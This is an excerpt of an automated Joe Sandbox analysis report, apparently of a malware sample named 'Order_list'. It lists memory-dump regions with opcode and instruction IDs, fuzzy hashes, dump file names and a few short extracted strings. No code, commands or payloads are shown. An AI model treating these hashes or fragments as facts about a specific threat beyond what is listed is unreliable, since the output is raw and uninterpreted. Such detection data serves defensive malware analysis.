                                                                                                                            • Opcode ID: 4e30365ad8a476a976baba7c406bf1611e41f87938f0f098072c0f2e4e5c7283
                                                                                                                            • Instruction ID: 844119e0be385083f3c248009d4b16956bf88256270e470764de73f57e145e7b
                                                                                                                            • Opcode Fuzzy Hash: 4e30365ad8a476a976baba7c406bf1611e41f87938f0f098072c0f2e4e5c7283
                                                                                                                            • Instruction Fuzzy Hash: F84179B1E016188BEB58CF6BCD457CAFAF3AFC8310F14C1AAD50CA6254EB740A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5ffd6a8f90ff96af2d17fc95cad3eecd49fb755a2efd3e5b84020a5ab4b22610
                                                                                                                            • Instruction ID: 62f6f4dc4bbb3620bbde2119268637281d776d6b901efd9993ebf3ef0e8077c1
                                                                                                                            • Opcode Fuzzy Hash: 5ffd6a8f90ff96af2d17fc95cad3eecd49fb755a2efd3e5b84020a5ab4b22610
                                                                                                                            • Instruction Fuzzy Hash: B94169B1E016188BEB58CF6BDD5579AFAF3AFC8300F04C1AAD50CA6264DB740A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ee8e83088d121a76662b3733a27bd1400b1c0c4f6c651a3878397ddbe90e30cb
                                                                                                                            • Instruction ID: 206f4a03718b548bb4e295e840ccaf099536032c19eee403edb409d3b3f01ebf
                                                                                                                            • Opcode Fuzzy Hash: ee8e83088d121a76662b3733a27bd1400b1c0c4f6c651a3878397ddbe90e30cb
                                                                                                                            • Instruction Fuzzy Hash: F04168B1E016188BEB58CF6BDD5578AFAF3BFC8304F04C1AAD50CA6264DB740A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 56bdf3a9a7548658bf9a7b628ca992e7f141c670ca6eeb47a89f60a7b4bd4df4
                                                                                                                            • Instruction ID: e6b157111f5bd1acc1a1394ef67396a18dfff0a4cfe170f7d548d0a03584db4c
                                                                                                                            • Opcode Fuzzy Hash: 56bdf3a9a7548658bf9a7b628ca992e7f141c670ca6eeb47a89f60a7b4bd4df4
                                                                                                                            • Instruction Fuzzy Hash: FA4159B1E016188BEB58CF6BDD457CAFAF3AFC9300F14C1AAD50CA6254EB744A858F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 4b2e647da88a3e8bb4a0a0a26b4f53e955b6869a17ac2b26922815552690d356
                                                                                                                            • Instruction ID: 81b3ec933303642f27d707335629709873618639ef17e829834162655ac8f221
                                                                                                                            • Opcode Fuzzy Hash: 4b2e647da88a3e8bb4a0a0a26b4f53e955b6869a17ac2b26922815552690d356
                                                                                                                            • Instruction Fuzzy Hash: 1D415CB1D016188BEB58CF6BD9457C9FAF3AFC8314F14C1AAD50CA6264DB740A868F51
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 2b2b722ca58572f786c9394f45269ea95c76184dfb3b802e31afa74e10f7be9c
                                                                                                                            • Instruction ID: 808ced2f57dc37894eb71d0f1c6cbb76f6d11817f4fe142ae5b0e1aa4d252986
                                                                                                                            • Opcode Fuzzy Hash: 2b2b722ca58572f786c9394f45269ea95c76184dfb3b802e31afa74e10f7be9c
                                                                                                                            • Instruction Fuzzy Hash: DF410071E052088BDB18DFAAD9446EEBBF2FF88300F20D12AC419BB258EB355945CF50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q$(o^q$(o^q$(o^q$(o^q$(o^q$,bq$,bq
                                                                                                                            • API String ID: 0-1932283790
                                                                                                                            • Opcode ID: 80330044e3200c130f55bb681a4336f0f142b36d2ded8cedd849ec93246b4110
                                                                                                                            • Instruction ID: a8ef93ea49d09cf364ac84d8f575dc414607872da01b4ccb71fbaccc5f37bddb
                                                                                                                            • Opcode Fuzzy Hash: 80330044e3200c130f55bb681a4336f0f142b36d2ded8cedd849ec93246b4110
                                                                                                                            • Instruction Fuzzy Hash: DC125A30A006099FDB15CF69D988A9EBBF2FF88314F158569E919DB3A1DB30ED41CB50
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: $^q$$^q
                                                                                                                            • API String ID: 0-355816377
                                                                                                                            • Opcode ID: 46cf210178c865218d24fd49bb863e6d70823b92443ddbb1b2e951d1d001e323
                                                                                                                            • Instruction ID: 05c4820a3a200682a5828b9de0315d5851f2cdd1ced133e53bf8a0d0ce2f224d
                                                                                                                            • Opcode Fuzzy Hash: 46cf210178c865218d24fd49bb863e6d70823b92443ddbb1b2e951d1d001e323
                                                                                                                            • Instruction Fuzzy Hash: E7521174A00219CFEB549BA8C8A4BAEBB76FF94300F1081A9C10A7B365DF359D85DF51
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: 4'^q$4'^q
                                                                                                                            • API String ID: 0-2697143702
                                                                                                                            • Opcode ID: 04cfbab2c111433fbca5eaf1ecb1c8e5618d86176386caa66aad64ce009ce693
                                                                                                                            • Instruction ID: 030fc1c7aaea534994711e99f012f8633c65ffe811dc53af15319683c9408227
                                                                                                                            • Opcode Fuzzy Hash: 04cfbab2c111433fbca5eaf1ecb1c8e5618d86176386caa66aad64ce009ce693
                                                                                                                            • Instruction Fuzzy Hash: C2B141B07141018FEB159B2DCD5CB393A9EEF85B44F19446AE606CF3A5EB25CC82C746
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Hbq$Hbq
                                                                                                                            • API String ID: 0-4258043069
                                                                                                                            • Opcode ID: d27785ce57f44ccfcb7afc13032e2fbad93673400772e4502ffa7813dffc5394
                                                                                                                            • Instruction ID: 244ba8df901bc9e958e4271d76b244f5635574f727df07467fe991cd1dc1481c
                                                                                                                            • Opcode Fuzzy Hash: d27785ce57f44ccfcb7afc13032e2fbad93673400772e4502ffa7813dffc5394
                                                                                                                            • Instruction Fuzzy Hash: 85B1BC317042558FDB269F78CC94B7A7BA6BF88304F1485A9E9078B391DF34D882CB91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: ,bq$,bq
                                                                                                                            • API String ID: 0-2699258169
                                                                                                                            • Opcode ID: 0bd79645c9731145aeaeb64cdd5983a2c61d68bf8f2f4eef1f54e4940672dd80
                                                                                                                            • Instruction ID: eead9eb50166ea1d5b306bb742cf11de8c6888de0debc870a72173446678b451
                                                                                                                            • Opcode Fuzzy Hash: 0bd79645c9731145aeaeb64cdd5983a2c61d68bf8f2f4eef1f54e4940672dd80
                                                                                                                            • Instruction Fuzzy Hash: A9819035A005058FDB14DF6DCC88AAABBB6FF89200B1485A9D507EB365DB31E842CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (&^q$(bq
                                                                                                                            • API String ID: 0-1294341849
                                                                                                                            • Opcode ID: 5c3a1eb36932ebca138383a96ab66a6faa5892e5a917641a0389715c5524318b
                                                                                                                            • Instruction ID: b67e51b73970a7ec13a23122cbcfd26ff908710a845db2cea6f3f433af66396c
                                                                                                                            • Opcode Fuzzy Hash: 5c3a1eb36932ebca138383a96ab66a6faa5892e5a917641a0389715c5524318b
                                                                                                                            • Instruction Fuzzy Hash: 62715F32F042199BDB15DFB9C8546AEBBF2BFC4740F14452AE406BB380DE34AD468B91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: Xbq$Xbq
                                                                                                                            • API String ID: 0-1243427068
                                                                                                                            • Opcode ID: c9e14b8c78e99384abdf5819e4b79ec7eac1e9e93617c4170fb0c5ba008fe4d8
                                                                                                                            • Instruction ID: 3446614ce69278cdc53078dba6b843bf126071ecf9379e3a6a7733bdcfb5e9b1
                                                                                                                            • Opcode Fuzzy Hash: c9e14b8c78e99384abdf5819e4b79ec7eac1e9e93617c4170fb0c5ba008fe4d8
                                                                                                                            • Instruction Fuzzy Hash: 13310A75B013258BEF2D8A7E9DD427EA9DABBC4210F144439E906C7388DF74CC45A7A1
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LR^q
                                                                                                                            • API String ID: 0-2625958711
                                                                                                                            • Opcode ID: 5bc6dfbc4dd116b8152798e55f027a5ca3984102aa2f9f72d92da626659fcdd0
                                                                                                                            • Instruction ID: c7979f99ee6b93a7de54f8ffb64b8b698ca1b23b90030d3d40c5eeb18953a827
                                                                                                                            • Opcode Fuzzy Hash: 5bc6dfbc4dd116b8152798e55f027a5ca3984102aa2f9f72d92da626659fcdd0
                                                                                                                            • Instruction Fuzzy Hash: 7422A974A01219CFCB64DF68ED88A9DBBB5FF48301F1085A9D809A7368DB346D85CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: LR^q
                                                                                                                            • API String ID: 0-2625958711
                                                                                                                            • Opcode ID: fd94c800580b65e70615ec7fdebb2fb67d96f8b351e4599b966dcd37209be632
                                                                                                                            • Instruction ID: cac03cc429ef5439742ce7f255bfa4d0e4ed87b994fb9275a6ae55ef98e3347d
                                                                                                                            • Opcode Fuzzy Hash: fd94c800580b65e70615ec7fdebb2fb67d96f8b351e4599b966dcd37209be632
                                                                                                                            • Instruction Fuzzy Hash: F522A974A01219CFCB64DF68ED88A9DBBB5FF48301F1085A9D809A7368DB346D85CF91
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID: (o^q
                                                                                                                            • API String ID: 0-74704288
                                                                                                                            • Opcode ID: eaffa59b4af410909c140483dd736c89bf00a96c06887bf73324d0a31337d7c7
                                                                                                                            • Instruction ID: 14e0fe5b70327738753e692984ead1de268fe99ce9d635e4b3ddc1b603bc1100
                                                                                                                            • Opcode Fuzzy Hash: eaffa59b4af410909c140483dd736c89bf00a96c06887bf73324d0a31337d7c7
                                                                                                                            • Instruction Fuzzy Hash: 5441CE357002449FCB199FB9DC946AEBBF6FBC9211F244469DA16DB391DE319C02CB90
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: ec020cde70ee26211f0ecb59905ea7ddb87dde0fe15815944e90ccbe287ef9a6
                                                                                                                            • Instruction ID: c83d34c7ef63da08556b867fa9e4c57f7af8773e79211b86b78037ca9a884371
                                                                                                                            • Opcode Fuzzy Hash: ec020cde70ee26211f0ecb59905ea7ddb87dde0fe15815944e90ccbe287ef9a6
                                                                                                                            • Instruction Fuzzy Hash: A4F12A75A00215CFCB05CFACD984AADBBF6FF88710B1A8459E515AB361CB31EC81CB50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 0d06680a6367063bd93fb24e5cf88f8cdbeab88c37598fb6989ae1ea2bb3d032
                                                                                                                            • Instruction ID: 5628e7b905714d68d6c37359099ba1ec5dc4964c8a7be3b917badd14c7dde236
                                                                                                                            • Opcode Fuzzy Hash: 0d06680a6367063bd93fb24e5cf88f8cdbeab88c37598fb6989ae1ea2bb3d032
                                                                                                                            • Instruction Fuzzy Hash: 5A71E7347002558FEB25DF2CCC98AAE7BE6AF49604F1540A9E906CB3B5DB70EC51CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: dfeb12cf392e85660bdba3aea9b46a09081ef8b4795cd71745ab27f291e5138a
                                                                                                                            • Instruction ID: aa699aa352f9b60da97c900c455bf42ac3bc8497cc3a0d14781c7c6f4ff7acfc
                                                                                                                            • Opcode Fuzzy Hash: dfeb12cf392e85660bdba3aea9b46a09081ef8b4795cd71745ab27f291e5138a
                                                                                                                            • Instruction Fuzzy Hash: 6951BF340723578FC3742FA0ADED16ABBB0FB0F32B715BD14A11E8901AAB3454A9DB11
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 22d4dc85619b97db7443824bbf55ba1439987e8fc90afede5b5cd74857bd2594
                                                                                                                            • Instruction ID: 3cdc136f6369463982e82d6bb2fabc049f329a4ebca36ec72655d22311aa5cac
                                                                                                                            • Opcode Fuzzy Hash: 22d4dc85619b97db7443824bbf55ba1439987e8fc90afede5b5cd74857bd2594
                                                                                                                            • Instruction Fuzzy Hash: D1519F340723578FC3742BA4ADED16E7BB4FB0F32B755BC10A11E8901AAB3454A9DB20
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1145051db343f84f6220c882e130755cf0356ce7a2680cdfb73a4814b6bad4cd
                                                                                                                            • Instruction ID: 994595c5591b6113e54fd74421ad312e340a525bd1d0d356550a662f4b5d354c
                                                                                                                            • Opcode Fuzzy Hash: 1145051db343f84f6220c882e130755cf0356ce7a2680cdfb73a4814b6bad4cd
                                                                                                                            • Instruction Fuzzy Hash: 5B51E374D01218DFDB14DFA5D9946DEBBB2FF88304F208529D809AB354DB365989CF40
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a606b9bdcb6620589ffb196c7cfc6fbd525e8ec95274e898b7950fa3c80fcfb8
                                                                                                                            • Instruction ID: bf0ed513f3f861745be6d2c47f479162e34b16ad576171c3dbc86016de001879
                                                                                                                            • Opcode Fuzzy Hash: a606b9bdcb6620589ffb196c7cfc6fbd525e8ec95274e898b7950fa3c80fcfb8
                                                                                                                            • Instruction Fuzzy Hash: 8451CA75E01209CFCB48DFA9E99489DBBF2FF89300B209469E815AB324DB359D46CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: cc6b6ed39905e32f5ba689269aafcf62f53b8effecd239c6e648eab1d92b81f5
                                                                                                                            • Instruction ID: ec094dbd9306d9c7fa9922be478f000bc1aca9a279fa7271e34bdee16c0e0ae1
                                                                                                                            • Opcode Fuzzy Hash: cc6b6ed39905e32f5ba689269aafcf62f53b8effecd239c6e648eab1d92b81f5
                                                                                                                            • Instruction Fuzzy Hash: 07518374E01208DFDB54DFA9D9849DDBBF2BF89300F24816AE819AB364DB30A905CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 42bd62d43cea8fcdcb31a779d8c8099dda99babc235273ce3c646871d3275029
                                                                                                                            • Instruction ID: 4ee6038a1b129055d88b32a371dcfd0953871af2464af323b2e92a43be3e7372
                                                                                                                            • Opcode Fuzzy Hash: 42bd62d43cea8fcdcb31a779d8c8099dda99babc235273ce3c646871d3275029
                                                                                                                            • Instruction Fuzzy Hash: 9A418E32912319CFDB24AFB0D45C7EE7BB6FB4A316F105869D11267284DB780A48CF99
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: a18a30a0359c39b4c52765c9c8c275cb17c1f4b30a57f1abe87004ae5a38f049
                                                                                                                            • Instruction ID: 7badec308f11e1fef3b897d86d63a5f9096a06568501f09f27eded64b6d64be7
                                                                                                                            • Opcode Fuzzy Hash: a18a30a0359c39b4c52765c9c8c275cb17c1f4b30a57f1abe87004ae5a38f049
                                                                                                                            • Instruction Fuzzy Hash: 6351C875E01208CFCB08DFA9D99489DBBF2FF89300B209469E805AB324DB35AD46CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 71029f4faf52fe753bd02f85fd0a4e687f0d955eda7dc54f3676cd136b59ac7c
                                                                                                                            • Instruction ID: d413862f168195eb200769b22750ee6dd027fac110dd7cc7ebec6a4e1f6af9ae
                                                                                                                            • Opcode Fuzzy Hash: 71029f4faf52fe753bd02f85fd0a4e687f0d955eda7dc54f3676cd136b59ac7c
                                                                                                                            • Instruction Fuzzy Hash: 6E419D31A04249DFCF12CFA8CC44AAEBFF2AF49368F048555E915AB395D334E951CBA0
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 08fe2c79ba60da1a188fc6c22f32b4d1f4a3f1f653eb69da74c048e6229dd495
                                                                                                                            • Instruction ID: df83214329767da8d4ac4dc8c9f120087df5944477dedb972ffdb694a980d6ed
                                                                                                                            • Opcode Fuzzy Hash: 08fe2c79ba60da1a188fc6c22f32b4d1f4a3f1f653eb69da74c048e6229dd495
                                                                                                                            • Instruction Fuzzy Hash: B3413432E002199BDF14DFA5C990ADFB7F1BF88700F14812AE415B7340EB70A946CB91
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 87a330246178f3335db57ab47239645326b9019e4741ca60240bd6c3daef03bb
                                                                                                                            • Instruction ID: b97742f85858c7edcd69554a0af2ee668aa0663af58815d088e0710a90346c77
                                                                                                                            • Opcode Fuzzy Hash: 87a330246178f3335db57ab47239645326b9019e4741ca60240bd6c3daef03bb
                                                                                                                            • Instruction Fuzzy Hash: B6416A70E05108CFCB15DFA8EC84AEDBBB2FF49305F2095A9D405A7245DB36A89ACF54
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 1a75ac7f0c88233acf33249abc874b399fa878c543736c09de852ac890445bec
                                                                                                                            • Instruction ID: 3c9e00287213e68fd7cc355f5b6281d99db3a0c8201fa35125e878229b78590f
                                                                                                                            • Opcode Fuzzy Hash: 1a75ac7f0c88233acf33249abc874b399fa878c543736c09de852ac890445bec
                                                                                                                            • Instruction Fuzzy Hash: DB412770D04248CFCB14DFE8E8846ADFBB2FF49304F61A919E419AB245DB359882CF24
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4160491907.0000000005DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DA0000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_5da0000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: c23616fa3637751c2c0b92879acd8f5bfd094185125e89e29f04f54334668387
                                                                                                                            • Instruction ID: 788a9a596e7ec1e8666b482ef8067bf5dfd240b9b198b4df1724ecdd83841aa6
                                                                                                                            • Opcode Fuzzy Hash: c23616fa3637751c2c0b92879acd8f5bfd094185125e89e29f04f54334668387
                                                                                                                            • Instruction Fuzzy Hash: 3A41F175E00209CFCB14DFA9D9986EEBBB2FF48304F20912AD419A7394DB385A46CF50
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: 5e193767e4e65ffd99eec62d38d7664c0b42fa0d8b075b3aec123ca44ed75c8c
                                                                                                                            • Instruction ID: a2ed2c8f62a52a44dfa0f26324156237545fda6d9299c1962e5c7c52f6706210
                                                                                                                            • Opcode Fuzzy Hash: 5e193767e4e65ffd99eec62d38d7664c0b42fa0d8b075b3aec123ca44ed75c8c
                                                                                                                            • Instruction Fuzzy Hash: 32415B70E05208CFCB16DFA8EC846EDBBB2FF49304F209599D404A7255DB769896CF64
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000003.00000002.4137684545.0000000001670000.00000040.00000800.00020000.00000000.sdmp, Offset: 01670000, based on PE: false
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_3_2_1670000_Order_list.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID:
                                                                                                                            • String ID:
                                                                                                                            • API String ID:
                                                                                                                            • Opcode ID: da2ea70519c961b42902f39143b60288f7cb4bb1b92fb2b5a1caac0941433ef1
                                                                                                                            • Instruction ID: 5aea2dff3230dc2b34088985cdb64f512a8ab434e3b47b9cdcc9bf8f2782a6d6
                                                                                                                            • Opcode Fuzzy Hash: da2ea70519c961b42902f39143b60288f7cb4bb1b92fb2b5a1caac0941433ef1
                                                                                                                            • Instruction Fuzzy Hash: B541AE30A00248DFDB25CF68DC44BBABBB6EB84300F05846AE8159B252EB74DC55CBA1
                                                                                                                            Memory Dump Source
